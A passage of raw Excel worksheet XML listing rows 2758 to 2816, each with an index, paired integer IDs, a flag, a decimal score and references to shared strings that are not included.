        <v>2756</v>
      </c>
      <c r="B2758">
        <v>3789</v>
      </c>
      <c r="C2758">
        <v>3789</v>
      </c>
      <c r="D2758">
        <v>1</v>
      </c>
      <c r="E2758">
        <v>0.99699997901916504</v>
      </c>
      <c r="F2758" t="s">
        <v>3911</v>
      </c>
      <c r="G2758" t="s">
        <v>5450</v>
      </c>
      <c r="H2758" t="s">
        <v>5451</v>
      </c>
    </row>
    <row r="2759" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2759" s="1">
        <v>2757</v>
      </c>
      <c r="B2759">
        <v>744</v>
      </c>
      <c r="C2759">
        <v>744</v>
      </c>
      <c r="D2759">
        <v>1</v>
      </c>
      <c r="E2759">
        <v>0.72630000114440918</v>
      </c>
      <c r="F2759" t="s">
        <v>3911</v>
      </c>
      <c r="G2759" t="s">
        <v>5452</v>
      </c>
      <c r="H2759" t="s">
        <v>5453</v>
      </c>
    </row>
    <row r="2760" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2760" s="1">
        <v>2758</v>
      </c>
      <c r="B2760">
        <v>4387</v>
      </c>
      <c r="C2760">
        <v>4387</v>
      </c>
      <c r="D2760">
        <v>1</v>
      </c>
      <c r="E2760">
        <v>0.49520000815391541</v>
      </c>
      <c r="F2760" t="s">
        <v>3911</v>
      </c>
      <c r="G2760" t="s">
        <v>5454</v>
      </c>
      <c r="H2760" t="s">
        <v>5455</v>
      </c>
    </row>
    <row r="2761" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2761" s="1">
        <v>2759</v>
      </c>
      <c r="B2761">
        <v>2248</v>
      </c>
      <c r="C2761">
        <v>2248</v>
      </c>
      <c r="D2761">
        <v>1</v>
      </c>
      <c r="E2761">
        <v>0.61210000514984131</v>
      </c>
      <c r="F2761" t="s">
        <v>3911</v>
      </c>
      <c r="G2761" t="s">
        <v>5456</v>
      </c>
      <c r="H2761" t="s">
        <v>5457</v>
      </c>
    </row>
    <row r="2762" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2762" s="1">
        <v>2760</v>
      </c>
      <c r="B2762">
        <v>743</v>
      </c>
      <c r="C2762">
        <v>743</v>
      </c>
      <c r="D2762">
        <v>1</v>
      </c>
      <c r="E2762">
        <v>0.67089998722076416</v>
      </c>
      <c r="F2762" t="s">
        <v>3911</v>
      </c>
      <c r="G2762" t="s">
        <v>5458</v>
      </c>
      <c r="H2762" t="s">
        <v>5459</v>
      </c>
    </row>
    <row r="2763" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2763" s="1">
        <v>2761</v>
      </c>
      <c r="B2763">
        <v>3321</v>
      </c>
      <c r="C2763">
        <v>3321</v>
      </c>
      <c r="D2763">
        <v>1</v>
      </c>
      <c r="E2763">
        <v>0.50150001049041748</v>
      </c>
      <c r="F2763" t="s">
        <v>3911</v>
      </c>
      <c r="G2763" t="s">
        <v>5460</v>
      </c>
      <c r="H2763" t="s">
        <v>5461</v>
      </c>
    </row>
    <row r="2764" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2764" s="1">
        <v>2762</v>
      </c>
      <c r="B2764">
        <v>7836</v>
      </c>
      <c r="C2764">
        <v>7836</v>
      </c>
      <c r="D2764">
        <v>1</v>
      </c>
      <c r="E2764">
        <v>0.92820000648498535</v>
      </c>
      <c r="F2764" t="s">
        <v>3911</v>
      </c>
      <c r="G2764" t="s">
        <v>5462</v>
      </c>
      <c r="H2764" t="s">
        <v>5463</v>
      </c>
    </row>
    <row r="2765" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2765" s="1">
        <v>2763</v>
      </c>
      <c r="B2765">
        <v>7835</v>
      </c>
      <c r="C2765">
        <v>7835</v>
      </c>
      <c r="D2765">
        <v>1</v>
      </c>
      <c r="E2765">
        <v>0.73760002851486206</v>
      </c>
      <c r="F2765" t="s">
        <v>3911</v>
      </c>
      <c r="G2765" t="s">
        <v>5464</v>
      </c>
      <c r="H2765" t="s">
        <v>5465</v>
      </c>
    </row>
    <row r="2766" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2766" s="1">
        <v>2764</v>
      </c>
      <c r="B2766">
        <v>6924</v>
      </c>
      <c r="C2766">
        <v>6924</v>
      </c>
      <c r="D2766">
        <v>1</v>
      </c>
      <c r="E2766">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2766" t="s">
        <v>3911</v>
      </c>
      <c r="G2766" t="s">
        <v>5466</v>
      </c>
      <c r="H2766" t="s">
        <v>5467</v>
      </c>
    </row>
    <row r="2767" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2767" s="1">
        <v>2765</v>
      </c>
      <c r="B2767">
        <v>152</v>
      </c>
      <c r="C2767">
        <v>152</v>
      </c>
      <c r="D2767">
        <v>1</v>
      </c>
      <c r="E2767">
        <v>0.75540000200271606</v>
      </c>
      <c r="F2767" t="s">
        <v>3911</v>
      </c>
      <c r="G2767" t="s">
        <v>5468</v>
      </c>
      <c r="H2767" t="s">
        <v>5469</v>
      </c>
    </row>
    <row r="2768" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2768" s="1">
        <v>2766</v>
      </c>
      <c r="B2768">
        <v>2119</v>
      </c>
      <c r="C2768">
        <v>2119</v>
      </c>
      <c r="D2768">
        <v>1</v>
      </c>
      <c r="E2768">
        <v>0.99940001964569092</v>
      </c>
      <c r="F2768" t="s">
        <v>3911</v>
      </c>
      <c r="G2768" t="s">
        <v>5470</v>
      </c>
      <c r="H2768" t="s">
        <v>5471</v>
      </c>
    </row>
    <row r="2769" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2769" s="1">
        <v>2767</v>
      </c>
      <c r="B2769">
        <v>3429</v>
      </c>
      <c r="C2769">
        <v>3429</v>
      </c>
      <c r="D2769">
        <v>1</v>
      </c>
      <c r="E2769">
        <v>0.87349998950958252</v>
      </c>
      <c r="F2769" t="s">
        <v>3911</v>
      </c>
      <c r="G2769" t="s">
        <v>5472</v>
      </c>
      <c r="H2769" t="s">
        <v>5473</v>
      </c>
    </row>
    <row r="2770" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2770" s="1">
        <v>2768</v>
      </c>
      <c r="B2770">
        <v>7036</v>
      </c>
      <c r="C2770">
        <v>7036</v>
      </c>
      <c r="D2770">
        <v>1</v>
      </c>
      <c r="E2770">
        <v>0.53619998693466187</v>
      </c>
      <c r="F2770" t="s">
        <v>3911</v>
      </c>
      <c r="G2770" t="s">
        <v>5474</v>
      </c>
      <c r="H2770" t="s">
        <v>5475</v>
      </c>
    </row>
    <row r="2771" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2771" s="1">
        <v>2769</v>
      </c>
      <c r="B2771">
        <v>5598</v>
      </c>
      <c r="C2771">
        <v>5598</v>
      </c>
      <c r="D2771">
        <v>1</v>
      </c>
      <c r="E2771">
        <v>0.99830001592636108</v>
      </c>
      <c r="F2771" t="s">
        <v>3911</v>
      </c>
      <c r="G2771" t="s">
        <v>5476</v>
      </c>
      <c r="H2771" t="s">
        <v>5477</v>
      </c>
    </row>
    <row r="2772" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2772" s="1">
        <v>2770</v>
      </c>
      <c r="B2772">
        <v>7064</v>
      </c>
      <c r="C2772">
        <v>7064</v>
      </c>
      <c r="D2772">
        <v>1</v>
      </c>
      <c r="E2772">
        <v>0.39899998903274542</v>
      </c>
      <c r="F2772" t="s">
        <v>3911</v>
      </c>
      <c r="G2772" t="s">
        <v>5478</v>
      </c>
      <c r="H2772" t="s">
        <v>5479</v>
      </c>
    </row>
    <row r="2773" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2773" s="1">
        <v>2771</v>
      </c>
      <c r="B2773">
        <v>1931</v>
      </c>
      <c r="C2773">
        <v>1931</v>
      </c>
      <c r="D2773">
        <v>1</v>
      </c>
      <c r="E2773">
        <v>0.69919997453689575</v>
      </c>
      <c r="F2773" t="s">
        <v>3911</v>
      </c>
      <c r="G2773" t="s">
        <v>5480</v>
      </c>
      <c r="H2773" t="s">
        <v>5481</v>
      </c>
    </row>
    <row r="2774" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2774" s="1">
        <v>2772</v>
      </c>
      <c r="B2774">
        <v>5506</v>
      </c>
      <c r="C2774">
        <v>5506</v>
      </c>
      <c r="D2774">
        <v>1</v>
      </c>
      <c r="E2774">
        <v>0.99949997663497925</v>
      </c>
      <c r="F2774" t="s">
        <v>3911</v>
      </c>
      <c r="G2774" t="s">
        <v>5482</v>
      </c>
      <c r="H2774" t="s">
        <v>5483</v>
      </c>
    </row>
    <row r="2775" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2775" s="1">
        <v>2773</v>
      </c>
      <c r="B2775">
        <v>5782</v>
      </c>
      <c r="C2775">
        <v>5782</v>
      </c>
      <c r="D2775">
        <v>1</v>
      </c>
      <c r="E2775">
        <v>0.99889999628067017</v>
      </c>
      <c r="F2775" t="s">
        <v>3911</v>
      </c>
      <c r="G2775" t="s">
        <v>5484</v>
      </c>
      <c r="H2775" t="s">
        <v>5485</v>
      </c>
    </row>
    <row r="2776" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2776" s="1">
        <v>2774</v>
      </c>
      <c r="B2776">
        <v>869</v>
      </c>
      <c r="C2776">
        <v>869</v>
      </c>
      <c r="D2776">
        <v>1</v>
      </c>
      <c r="E2776">
        <v>0.99949997663497925</v>
      </c>
      <c r="F2776" t="s">
        <v>3911</v>
      </c>
      <c r="G2776" t="s">
        <v>5486</v>
      </c>
      <c r="H2776" t="s">
        <v>5487</v>
      </c>
    </row>
    <row r="2777" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2777" s="1">
        <v>2775</v>
      </c>
      <c r="B2777">
        <v>2013</v>
      </c>
      <c r="C2777">
        <v>2013</v>
      </c>
      <c r="D2777">
        <v>1</v>
      </c>
      <c r="E2777">
        <v>0.99470001459121704</v>
      </c>
      <c r="F2777" t="s">
        <v>3911</v>
      </c>
      <c r="G2777" t="s">
        <v>5488</v>
      </c>
      <c r="H2777" t="s">
        <v>5489</v>
      </c>
    </row>
    <row r="2778" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2778" s="1">
        <v>2776</v>
      </c>
      <c r="B2778">
        <v>5601</v>
      </c>
      <c r="C2778">
        <v>5601</v>
      </c>
      <c r="D2778">
        <v>1</v>
      </c>
      <c r="E2778">
        <v>0.99800002574920654</v>
      </c>
      <c r="F2778" t="s">
        <v>3911</v>
      </c>
      <c r="G2778" t="s">
        <v>5490</v>
      </c>
      <c r="H2778" t="s">
        <v>5491</v>
      </c>
    </row>
    <row r="2779" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2779" s="1">
        <v>2777</v>
      </c>
      <c r="B2779">
        <v>5507</v>
      </c>
      <c r="C2779">
        <v>5507</v>
      </c>
      <c r="D2779">
        <v>1</v>
      </c>
      <c r="E2779">
        <v>0.99699997901916504</v>
      </c>
      <c r="F2779" t="s">
        <v>3911</v>
      </c>
      <c r="G2779" t="s">
        <v>5492</v>
      </c>
      <c r="H2779" t="s">
        <v>5493</v>
      </c>
    </row>
    <row r="2780" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2780" s="1">
        <v>2778</v>
      </c>
      <c r="B2780">
        <v>5783</v>
      </c>
      <c r="C2780">
        <v>5783</v>
      </c>
      <c r="D2780">
        <v>1</v>
      </c>
      <c r="E2780">
        <v>0.76819998025894165</v>
      </c>
      <c r="F2780" t="s">
        <v>3911</v>
      </c>
      <c r="G2780" t="s">
        <v>5494</v>
      </c>
      <c r="H2780" t="s">
        <v>5495</v>
      </c>
    </row>
    <row r="2781" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2781" s="1">
        <v>2779</v>
      </c>
      <c r="B2781">
        <v>1952</v>
      </c>
      <c r="C2781">
        <v>1952</v>
      </c>
      <c r="D2781">
        <v>1</v>
      </c>
      <c r="E2781">
        <v>0.61989998817443848</v>
      </c>
      <c r="F2781" t="s">
        <v>3911</v>
      </c>
      <c r="G2781" t="s">
        <v>5496</v>
      </c>
      <c r="H2781" t="s">
        <v>5497</v>
      </c>
    </row>
    <row r="2782" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2782" s="1">
        <v>2780</v>
      </c>
      <c r="B2782">
        <v>1932</v>
      </c>
      <c r="C2782">
        <v>1932</v>
      </c>
      <c r="D2782">
        <v>1</v>
      </c>
      <c r="E2782">
        <v>0.66829997301101685</v>
      </c>
      <c r="F2782" t="s">
        <v>3911</v>
      </c>
      <c r="G2782" t="s">
        <v>5498</v>
      </c>
      <c r="H2782" t="s">
        <v>5499</v>
      </c>
    </row>
    <row r="2783" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2783" s="1">
        <v>2781</v>
      </c>
      <c r="B2783">
        <v>5784</v>
      </c>
      <c r="C2783">
        <v>5784</v>
      </c>
      <c r="D2783">
        <v>1</v>
      </c>
      <c r="E2783">
        <v>0.99839997291564941</v>
      </c>
      <c r="F2783" t="s">
        <v>3911</v>
      </c>
      <c r="G2783" t="s">
        <v>5500</v>
      </c>
      <c r="H2783" t="s">
        <v>5501</v>
      </c>
    </row>
    <row r="2784" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2784" s="1">
        <v>2782</v>
      </c>
      <c r="B2784">
        <v>3409</v>
      </c>
      <c r="C2784">
        <v>3409</v>
      </c>
      <c r="D2784">
        <v>1</v>
      </c>
      <c r="E2784">
        <v>0.47819998860359192</v>
      </c>
      <c r="F2784" t="s">
        <v>3911</v>
      </c>
      <c r="G2784" t="s">
        <v>5502</v>
      </c>
      <c r="H2784" t="s">
        <v>5503</v>
      </c>
    </row>
    <row r="2785" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2785" s="1">
        <v>2783</v>
      </c>
      <c r="B2785">
        <v>7038</v>
      </c>
      <c r="C2785">
        <v>7038</v>
      </c>
      <c r="D2785">
        <v>1</v>
      </c>
      <c r="E2785">
        <v>0.85149997472763062</v>
      </c>
      <c r="F2785" t="s">
        <v>3911</v>
      </c>
      <c r="G2785" t="s">
        <v>5504</v>
      </c>
      <c r="H2785" t="s">
        <v>5505</v>
      </c>
    </row>
    <row r="2786" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2786" s="1">
        <v>2784</v>
      </c>
      <c r="B2786">
        <v>1997</v>
      </c>
      <c r="C2786">
        <v>1997</v>
      </c>
      <c r="D2786">
        <v>1</v>
      </c>
      <c r="E2786">
        <v>0.80549997091293335</v>
      </c>
      <c r="F2786" t="s">
        <v>3911</v>
      </c>
      <c r="G2786" t="s">
        <v>5506</v>
      </c>
      <c r="H2786" t="s">
        <v>5507</v>
      </c>
    </row>
    <row r="2787" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2787" s="1">
        <v>2785</v>
      </c>
      <c r="B2787">
        <v>5101</v>
      </c>
      <c r="C2787">
        <v>5101</v>
      </c>
      <c r="D2787">
        <v>1</v>
      </c>
      <c r="E2787">
        <v>0.65829998254776001</v>
      </c>
      <c r="F2787" t="s">
        <v>3911</v>
      </c>
      <c r="G2787" t="s">
        <v>5508</v>
      </c>
      <c r="H2787" t="s">
        <v>5509</v>
      </c>
    </row>
    <row r="2788" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2788" s="1">
        <v>2786</v>
      </c>
      <c r="B2788">
        <v>1983</v>
      </c>
      <c r="C2788">
        <v>1983</v>
      </c>
      <c r="D2788">
        <v>1</v>
      </c>
      <c r="E2788">
        <v>0.69040000438690186</v>
      </c>
      <c r="F2788" t="s">
        <v>3911</v>
      </c>
      <c r="G2788" t="s">
        <v>5510</v>
      </c>
      <c r="H2788" t="s">
        <v>5511</v>
      </c>
    </row>
    <row r="2789" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2789" s="1">
        <v>2787</v>
      </c>
      <c r="B2789">
        <v>1965</v>
      </c>
      <c r="C2789">
        <v>1965</v>
      </c>
      <c r="D2789">
        <v>1</v>
      </c>
      <c r="E2789">
        <v>0.58939999341964722</v>
      </c>
      <c r="F2789" t="s">
        <v>3911</v>
      </c>
      <c r="G2789" t="s">
        <v>5512</v>
      </c>
      <c r="H2789" t="s">
        <v>5513</v>
      </c>
    </row>
    <row r="2790" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2790" s="1">
        <v>2788</v>
      </c>
      <c r="B2790">
        <v>7050</v>
      </c>
      <c r="C2790">
        <v>7050</v>
      </c>
      <c r="D2790">
        <v>1</v>
      </c>
      <c r="E2790">
        <v>0.77700001001358032</v>
      </c>
      <c r="F2790" t="s">
        <v>3911</v>
      </c>
      <c r="G2790" t="s">
        <v>5514</v>
      </c>
      <c r="H2790" t="s">
        <v>5515</v>
      </c>
    </row>
    <row r="2791" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2791" s="1">
        <v>2789</v>
      </c>
      <c r="B2791">
        <v>4554</v>
      </c>
      <c r="C2791">
        <v>4554</v>
      </c>
      <c r="D2791">
        <v>1</v>
      </c>
      <c r="E2791">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2791" t="s">
        <v>3911</v>
      </c>
      <c r="G2791" t="s">
        <v>5516</v>
      </c>
      <c r="H2791" t="s">
        <v>5517</v>
      </c>
    </row>
    <row r="2792" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2792" s="1">
        <v>2790</v>
      </c>
      <c r="B2792">
        <v>3438</v>
      </c>
      <c r="C2792">
        <v>3438</v>
      </c>
      <c r="D2792">
        <v>1</v>
      </c>
      <c r="E2792">
        <v>0.77619999647140503</v>
      </c>
      <c r="F2792" t="s">
        <v>3911</v>
      </c>
      <c r="G2792" t="s">
        <v>5518</v>
      </c>
      <c r="H2792" t="s">
        <v>5519</v>
      </c>
    </row>
    <row r="2793" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2793" s="1">
        <v>2791</v>
      </c>
      <c r="B2793">
        <v>903</v>
      </c>
      <c r="C2793">
        <v>903</v>
      </c>
      <c r="D2793">
        <v>1</v>
      </c>
      <c r="E2793">
        <v>0.57819998264312744</v>
      </c>
      <c r="F2793" t="s">
        <v>3911</v>
      </c>
      <c r="G2793" t="s">
        <v>5520</v>
      </c>
      <c r="H2793" t="s">
        <v>5521</v>
      </c>
    </row>
    <row r="2794" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2794" s="1">
        <v>2792</v>
      </c>
      <c r="B2794">
        <v>7048</v>
      </c>
      <c r="C2794">
        <v>7048</v>
      </c>
      <c r="D2794">
        <v>1</v>
      </c>
      <c r="E2794">
        <v>0.45719999074935908</v>
      </c>
      <c r="F2794" t="s">
        <v>3911</v>
      </c>
      <c r="G2794" t="s">
        <v>5522</v>
      </c>
      <c r="H2794" t="s">
        <v>5523</v>
      </c>
    </row>
    <row r="2795" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2795" s="1">
        <v>2793</v>
      </c>
      <c r="B2795">
        <v>1988</v>
      </c>
      <c r="C2795">
        <v>1988</v>
      </c>
      <c r="D2795">
        <v>1</v>
      </c>
      <c r="E2795">
        <v>0.99140000343322754</v>
      </c>
      <c r="F2795" t="s">
        <v>3911</v>
      </c>
      <c r="G2795" t="s">
        <v>5524</v>
      </c>
      <c r="H2795" t="s">
        <v>5525</v>
      </c>
    </row>
    <row r="2796" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2796" s="1">
        <v>2794</v>
      </c>
      <c r="B2796">
        <v>5599</v>
      </c>
      <c r="C2796">
        <v>5599</v>
      </c>
      <c r="D2796">
        <v>1</v>
      </c>
      <c r="E2796">
        <v>0.9440000057220459</v>
      </c>
      <c r="F2796" t="s">
        <v>3911</v>
      </c>
      <c r="G2796" t="s">
        <v>5526</v>
      </c>
      <c r="H2796" t="s">
        <v>5527</v>
      </c>
    </row>
    <row r="2797" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2797" s="1">
        <v>2795</v>
      </c>
      <c r="B2797">
        <v>7044</v>
      </c>
      <c r="C2797">
        <v>7044</v>
      </c>
      <c r="D2797">
        <v>1</v>
      </c>
      <c r="E2797">
        <v>0.47440001368522638</v>
      </c>
      <c r="F2797" t="s">
        <v>3911</v>
      </c>
      <c r="G2797" t="s">
        <v>5528</v>
      </c>
      <c r="H2797" t="s">
        <v>5529</v>
      </c>
    </row>
    <row r="2798" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2798" s="1">
        <v>2796</v>
      </c>
      <c r="B2798">
        <v>882</v>
      </c>
      <c r="C2798">
        <v>882</v>
      </c>
      <c r="D2798">
        <v>1</v>
      </c>
      <c r="E2798">
        <v>0.65759998559951782</v>
      </c>
      <c r="F2798" t="s">
        <v>3911</v>
      </c>
      <c r="G2798" t="s">
        <v>5530</v>
      </c>
      <c r="H2798" t="s">
        <v>5531</v>
      </c>
    </row>
    <row r="2799" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2799" s="1">
        <v>2797</v>
      </c>
      <c r="B2799">
        <v>7047</v>
      </c>
      <c r="C2799">
        <v>7047</v>
      </c>
      <c r="D2799">
        <v>1</v>
      </c>
      <c r="E2799">
        <v>0.93459999561309814</v>
      </c>
      <c r="F2799" t="s">
        <v>3911</v>
      </c>
      <c r="G2799" t="s">
        <v>5532</v>
      </c>
      <c r="H2799" t="s">
        <v>5533</v>
      </c>
    </row>
    <row r="2800" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2800" s="1">
        <v>2798</v>
      </c>
      <c r="B2800">
        <v>7039</v>
      </c>
      <c r="C2800">
        <v>7039</v>
      </c>
      <c r="D2800">
        <v>1</v>
      </c>
      <c r="E2800">
        <v>0.55629998445510864</v>
      </c>
      <c r="F2800" t="s">
        <v>3911</v>
      </c>
      <c r="G2800" t="s">
        <v>5534</v>
      </c>
      <c r="H2800" t="s">
        <v>5535</v>
      </c>
    </row>
    <row r="2801" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2801" s="1">
        <v>2799</v>
      </c>
      <c r="B2801">
        <v>5508</v>
      </c>
      <c r="C2801">
        <v>5508</v>
      </c>
      <c r="D2801">
        <v>1</v>
      </c>
      <c r="E2801">
        <v>0.99830001592636108</v>
      </c>
      <c r="F2801" t="s">
        <v>3911</v>
      </c>
      <c r="G2801" t="s">
        <v>5536</v>
      </c>
      <c r="H2801" t="s">
        <v>5537</v>
      </c>
    </row>
    <row r="2802" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2802" s="1">
        <v>2800</v>
      </c>
      <c r="B2802">
        <v>2017</v>
      </c>
      <c r="C2802">
        <v>2017</v>
      </c>
      <c r="D2802">
        <v>1</v>
      </c>
      <c r="E2802">
        <v>0.9749000072479248</v>
      </c>
      <c r="F2802" t="s">
        <v>3911</v>
      </c>
      <c r="G2802" t="s">
        <v>5538</v>
      </c>
      <c r="H2802" t="s">
        <v>5539</v>
      </c>
    </row>
    <row r="2803" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2803" s="1">
        <v>2801</v>
      </c>
      <c r="B2803">
        <v>7080</v>
      </c>
      <c r="C2803">
        <v>7080</v>
      </c>
      <c r="D2803">
        <v>1</v>
      </c>
      <c r="E2803">
        <v>0.75809997320175171</v>
      </c>
      <c r="F2803" t="s">
        <v>3911</v>
      </c>
      <c r="G2803" t="s">
        <v>5540</v>
      </c>
      <c r="H2803" t="s">
        <v>5541</v>
      </c>
    </row>
    <row r="2804" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2804" s="1">
        <v>2802</v>
      </c>
      <c r="B2804">
        <v>1963</v>
      </c>
      <c r="C2804">
        <v>1963</v>
      </c>
      <c r="D2804">
        <v>1</v>
      </c>
      <c r="E2804">
        <v>0.34560000896453857</v>
      </c>
      <c r="F2804" t="s">
        <v>3911</v>
      </c>
      <c r="G2804" t="s">
        <v>5542</v>
      </c>
      <c r="H2804" t="s">
        <v>5543</v>
      </c>
    </row>
    <row r="2805" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2805" s="1">
        <v>2803</v>
      </c>
      <c r="B2805">
        <v>7052</v>
      </c>
      <c r="C2805">
        <v>7052</v>
      </c>
      <c r="D2805">
        <v>1</v>
      </c>
      <c r="E2805">
        <v>0.85989999771118164</v>
      </c>
      <c r="F2805" t="s">
        <v>3911</v>
      </c>
      <c r="G2805" t="s">
        <v>5544</v>
      </c>
      <c r="H2805" t="s">
        <v>5545</v>
      </c>
    </row>
    <row r="2806" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2806" s="1">
        <v>2804</v>
      </c>
      <c r="B2806">
        <v>3407</v>
      </c>
      <c r="C2806">
        <v>3407</v>
      </c>
      <c r="D2806">
        <v>1</v>
      </c>
      <c r="E2806">
        <v>0.99959999322891235</v>
      </c>
      <c r="F2806" t="s">
        <v>3911</v>
      </c>
      <c r="G2806" t="s">
        <v>5546</v>
      </c>
      <c r="H2806" t="s">
        <v>5547</v>
      </c>
    </row>
    <row r="2807" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2807" s="1">
        <v>2805</v>
      </c>
      <c r="B2807">
        <v>7079</v>
      </c>
      <c r="C2807">
        <v>7079</v>
      </c>
      <c r="D2807">
        <v>1</v>
      </c>
      <c r="E2807">
        <v>0.85939997434616089</v>
      </c>
      <c r="F2807" t="s">
        <v>3911</v>
      </c>
      <c r="G2807" t="s">
        <v>5548</v>
      </c>
      <c r="H2807" t="s">
        <v>4123</v>
      </c>
    </row>
    <row r="2808" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2808" s="1">
        <v>2806</v>
      </c>
      <c r="B2808">
        <v>7031</v>
      </c>
      <c r="C2808">
        <v>7031</v>
      </c>
      <c r="D2808">
        <v>1</v>
      </c>
      <c r="E2808">
        <v>0.63580000400543213</v>
      </c>
      <c r="F2808" t="s">
        <v>3911</v>
      </c>
      <c r="G2808" t="s">
        <v>5549</v>
      </c>
      <c r="H2808" t="s">
        <v>5550</v>
      </c>
    </row>
    <row r="2809" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2809" s="1">
        <v>2807</v>
      </c>
      <c r="B2809">
        <v>1964</v>
      </c>
      <c r="C2809">
        <v>1964</v>
      </c>
      <c r="D2809">
        <v>1</v>
      </c>
      <c r="E2809">
        <v>0.68449997901916504</v>
      </c>
      <c r="F2809" t="s">
        <v>3911</v>
      </c>
      <c r="G2809" t="s">
        <v>5551</v>
      </c>
      <c r="H2809" t="s">
        <v>5552</v>
      </c>
    </row>
    <row r="2810" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2810" s="1">
        <v>2808</v>
      </c>
      <c r="B2810">
        <v>3423</v>
      </c>
      <c r="C2810">
        <v>3423</v>
      </c>
      <c r="D2810">
        <v>1</v>
      </c>
      <c r="E2810">
        <v>0.80940002202987671</v>
      </c>
      <c r="F2810" t="s">
        <v>3911</v>
      </c>
      <c r="G2810" t="s">
        <v>5553</v>
      </c>
      <c r="H2810" t="s">
        <v>5554</v>
      </c>
    </row>
    <row r="2811" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2811" s="1">
        <v>2809</v>
      </c>
      <c r="B2811">
        <v>7053</v>
      </c>
      <c r="C2811">
        <v>7053</v>
      </c>
      <c r="D2811">
        <v>1</v>
      </c>
      <c r="E2811">
        <v>0.7368999719619751</v>
      </c>
      <c r="F2811" t="s">
        <v>3911</v>
      </c>
      <c r="G2811" t="s">
        <v>5555</v>
      </c>
      <c r="H2811" t="s">
        <v>5556</v>
      </c>
    </row>
    <row r="2812" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2812" s="1">
        <v>2810</v>
      </c>
      <c r="B2812">
        <v>5604</v>
      </c>
      <c r="C2812">
        <v>5604</v>
      </c>
      <c r="D2812">
        <v>1</v>
      </c>
      <c r="E2812">
        <v>0.99889999628067017</v>
      </c>
      <c r="F2812" t="s">
        <v>3911</v>
      </c>
      <c r="G2812" t="s">
        <v>5557</v>
      </c>
      <c r="H2812" t="s">
        <v>5558</v>
      </c>
    </row>
    <row r="2813" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2813" s="1">
        <v>2811</v>
      </c>
      <c r="B2813">
        <v>5771</v>
      </c>
      <c r="C2813">
        <v>5771</v>
      </c>
      <c r="D2813">
        <v>1</v>
      </c>
      <c r="E2813">
        <v>0.60350000858306885</v>
      </c>
      <c r="F2813" t="s">
        <v>3911</v>
      </c>
      <c r="G2813" t="s">
        <v>5559</v>
      </c>
      <c r="H2813" t="s">
        <v>5560</v>
      </c>
    </row>
    <row r="2814" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2814" s="1">
        <v>2812</v>
      </c>
      <c r="B2814">
        <v>4546</v>
      </c>
      <c r="C2814">
        <v>4546</v>
      </c>
      <c r="D2814">
        <v>1</v>
      </c>
      <c r="E2814">
        <v>0.68940001726150513</v>
      </c>
      <c r="F2814" t="s">
        <v>3911</v>
      </c>
      <c r="G2814" t="s">
        <v>5561</v>
      </c>
      <c r="H2814" t="s">
        <v>5562</v>
      </c>
    </row>
    <row r="2815" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2815" s="1">
        <v>2813</v>
      </c>
      <c r="B2815">
        <v>3747</v>
      </c>
      <c r="C2815">
        <v>3747</v>
      </c>
      <c r="D2815">
        <v>1</v>
      </c>
      <c r="E2815">
        <v>0.86599999666213989</v>
      </c>
      <c r="F2815" t="s">
        <v>3911</v>
      </c>
      <c r="G2815" t="s">
        <v>5563</v>
      </c>
      <c r="H2815" t="s">
        <v>5564</v>
      </c>
    </row>
    <row r="2816" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2816" s="1">
        <v>2814</v>
      </c>
      <c r="B2816">
        <v>5770</v>
      </c>
      <c r="C2816">
        <v>5770</v>
      </c>
      <c r="D2816">
        <v>1</v>
      </c>
      <c r="E2816">
